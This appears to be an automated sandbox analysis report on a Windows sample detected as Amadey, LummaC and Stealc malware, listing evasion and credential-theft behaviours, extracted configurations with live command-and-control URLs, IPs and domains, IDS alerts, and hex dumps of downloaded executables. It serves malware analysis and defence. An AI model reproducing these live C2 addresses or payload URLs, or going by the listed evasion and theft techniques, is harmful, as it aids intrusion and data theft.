Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1572092
MD5: 326ad6c04a850bb9ba3ce77d62df16e9
SHA1: 0368902cb7250e0aef40b8d67606234d5934f5fd
SHA256: a4e844ff190e6bb8c0afab32f76630758d7b196ae40062765ab8ff457bf1b9b3
Tags: exeuser-Bitsight
Infos:

Detection

Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Monitors registry run keys for changes
PE file contains section with special chars
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: https://atten-supporse.biz/apite Avira URL Cloud: Label: malware
Source: http://185.215.113.16/off/random.exek Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpA. Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/unique2/random.exeEi Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/unique2/random.exeed Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/apipy Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Avira: detection malicious, Label: HEUR/AGEN.1320706
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: HEUR/AGEN.1320706
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Found malware configuration
Source: 00000006.00000002.3255134958.00000000001F1000.00000040.00000001.01000000.00000008.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 79ddad050f.exe.5228.8.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["formy-spill.biz", "se-blurry.biz", "dwell-exclaim.biz", "print-vexer.biz", "covery-mover.biz", "impend-differ.biz", "dare-curbys.biz", "zinc-sneark.biz", "atten-supporse.biz"], "Build id": "LOGS11--LiveTraffic"}
Source: e051bdf457.exe.3716.9.memstrmin Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}
Multi AV Scanner detection for domain / URL
Source: https://atten-supporse.biz/apite Virustotal: Detection: 18% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 63%
Multi AV Scanner detection for submitted file
Source: file.exe Virustotal: Detection: 58% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_004035B0 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey, 7_2_004035B0
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B73817 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey, 7_2_04B73817
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49872 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49879 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49887 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49894 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49906 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49913 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49915 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49934 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49937 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49948 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49967 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49972 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49973 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:49974 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49993 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:50041 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:50042 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 734386a52c.exe, 0000001E.00000002.3260064307.0000000000AB2000.00000040.00000001.01000000.00000014.sdmp, 734386a52c.exe, 0000001E.00000003.3184731936.00000000048A0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_004176E7 FindFirstFileExW, 7_2_004176E7
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_10007EA9 FindFirstFileExW, 7_2_10007EA9
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B8794E FindFirstFileExW, 7_2_04B8794E
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: chrome.exe Memory has grown: Private usage: 1MB later: 28MB
Source: firefox.exe Memory has grown: Private usage: 1MB later: 192MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49821 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:49828
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49849 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz) : 192.168.2.5:54969 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49872 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49868 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49879 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49887 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49894 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49893 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49895 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49895 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49906 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.5:49895
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49895 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.5:49895
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49913 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49914 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49934 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49937 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49915 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49895 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49948 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49967 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49972 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49993 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:50042 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:50041 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49966 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49879 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49879 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49915 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49915 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49913 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49934 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49934 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49872 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49872 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49967 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50041 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50041 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50042 -> 104.21.64.1:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50042 -> 104.21.64.1:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: formy-spill.biz
Source: Malware configuration extractor URLs: se-blurry.biz
Source: Malware configuration extractor URLs: dwell-exclaim.biz
Source: Malware configuration extractor URLs: print-vexer.biz
Source: Malware configuration extractor URLs: covery-mover.biz
Source: Malware configuration extractor URLs: impend-differ.biz
Source: Malware configuration extractor URLs: dare-curbys.biz
Source: Malware configuration extractor URLs: zinc-sneark.biz
Source: Malware configuration extractor URLs: atten-supporse.biz
Source: Malware configuration extractor IPs: 185.215.113.43
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 04:10:10 GMTContent-Type: application/octet-streamContent-Length: 1990144Last-Modified: Tue, 10 Dec 2024 03:19:19 GMTConnection: keep-aliveETag: "6757b337-1e5e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 21 4a f8 9d 40 24 ab 9d 40 24 ab 9d 40 24 ab 83 12 a0 ab 81 40 24 ab 83 12 b1 ab 89 40 24 ab 83 12 a7 ab c5 40 24 ab ba 86 5f ab 94 40 24 ab 9d 40 25 ab f6 40 24 ab 83 12 ae ab 9c 40 24 ab 83 12 b0 ab 9c 40 24 ab 83 12 b5 ab 9c 40 24 ab 52 69 63 68 9d 40 24 ab 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 0c de dd 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 d4 02 00 00 b0 01 00 00 00 00 00 00 60 87 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 87 00 00 04 00 00 a6 17 1f 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5a 10 42 00 6e 00 00 00 00 e0 40 00 68 21 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 9a 86 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 40 00 00 10 00 00 00 54 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 68 21 01 00 00 e0 40 00 00 94 00 00 00 64 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 42 00 00 02 00 00 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 29 00 00 20 42 00 00 02 00 00 00 fa 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 68 76 71 69 6a 6f 76 00 40 1b 00 00 10 6c 00 00 3a 1b 00 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 6b 77 6e 69 66 6c 74 00 10 00 00 00 50 87 00 00 06 00 00 00 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 87 00 00 22 00 00 00 3c 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 04:10:18 GMTContent-Type: application/octet-streamContent-Length: 1832448Last-Modified: Tue, 10 Dec 2024 03:29:09 GMTConnection: keep-aliveETag: "6757b585-1bf600"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 ea b9 55 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 dc 03 00 00 b2 00 00 00 00 00 00 00 c0 48 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 48 00 00 04 00 00 e1 06 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 40 05 00 70 00 00 00 00 30 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 41 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 20 05 00 00 10 00 00 00 42 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 30 05 00 00 04 00 00 00 52 02 00 00 00 00 00 00 00 00 00 